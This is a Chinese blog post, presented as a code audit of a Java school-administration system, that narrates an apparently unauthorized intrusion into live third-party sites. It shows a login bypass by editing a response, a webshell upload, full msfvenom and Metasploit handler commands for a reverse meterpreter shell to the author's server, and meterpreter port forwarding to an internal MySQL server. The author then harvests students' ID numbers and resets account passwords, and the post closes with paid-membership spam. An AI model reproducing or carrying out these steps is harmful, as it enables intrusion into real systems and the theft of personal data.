代码审计 | 曲折的某java教务系统代码审计
点击此处查看最新的网赚项目教程
这个监听器,可以让javaBean感知,被钝化或活化。
钝化—>将session中的javaBean保存到文件中.
活化—>从文件中将javaBean直接获取。也就是说我们想通过改返回值”status”: “y”绕过认证不太可能了
只能看看有啥可以未授权访问的功能,看白名单,有个文件下载,看上去可以,但实践不行。
本地debug 可以穿目录下载文件 ok 实际测试Fuzz一波不行0.0,放弃
因为没有啥未授权的洞,只能搞账号,本地搭起环境麻烦审出来,也得有账号进实际的才有意思,而登录有验证码,如果训练识别验证码爆破很麻烦,而且效率低靠运气!放弃…..但找回密码,
只 需要学号+身份证,后返回随机密码,无需电话验证还是有希望
打使用该系统的目标来获取学号和身份证
谷歌+社工库没找到
直接打使用该系统的目标,通过漏洞获取账号+身份证 或者直接密码
这里有3个有效目标
挑第一个目标,企业查查确定资产,子域名……快速一波没有洞,打微信小程序也没洞,反编译小程序麻烦最后再试
goby扫端口重定向的域名的站,发现可管理员后台登录
为ThinkPhp的站,TP的站常规工具打一波payload,无效,爆破无效,登录发包改返回包0改1
直接跳转到这,直接可以文件上传.
真是好家伙!!任意文件上传,直接送shell来了。
目的拿学号+身份证 或者直接密码,翻数据库配置文件
扫端口未开放3306,只能
端口转发出来
为了上传下载文件稳定性,这里用 msf进行(reGeorg 可能环境原因连不上)
生成马
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=服务器IP lport=667 -f elf > msf_667msfconsole上监听
use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 0.0.0.0set lport 667run
把生成的马上传上webshell,然后运行
chmod +x /tmp/msf_667/tmp/msf_667
在反弹回来的meterpreter上进行端口转发
portfwd add -l 670 -p 3306 -r 127.0.0.1
但站库分离,mysql不在这台机,淦卡住了,想其它代理,但可以直接将转发地址改为mysql服务器地址,
127.0.0.1改mysql地址 portfwd add -l 671 -p 3306 -r 201.x.x.1
成功转发,msf转发感谢TARI师兄的教导
成功连接,只有学号和电话,密码加盐了
在另外的数据库翻到超级管理员的密码这里不加盐但,登进去没啥可以获取学生身份证的功能,废了
在用户登录为另外的网站,输入账号为手机号,密码随手123456 登录成功返回身份证 NB学号和身份证有了
有了 学号和身份证,回到要代码审计的系统去重置密码,重置他会返回随机密码:
成功登录。终于可以好好审计了
再次黑白盒结合审计:(有待更新)
才测一下子文件上传就崩了或者关网站了…,没法访问了淦 ,有白名单无法绕过,因为他会重命名00截断对文件名无效,但patn参数直接拼接可控,该系统用jdk7,可以尝试00截断,但实际path后有/不知可否截断
受空字节截断影响的JDK版本范围:JDK
——————————————————————————
❤️爱心三连击
———END———
限 时 特 惠: 本站每日持续更新海量各大内部创业教程,一年会员只需98元,全站资源免费下载 点击查看详情
站 长 微 信: qs62318888
主题授权提示:请在后台主题设置-主题授权-激活主题的正版授权,授权购买:RiTheme官网
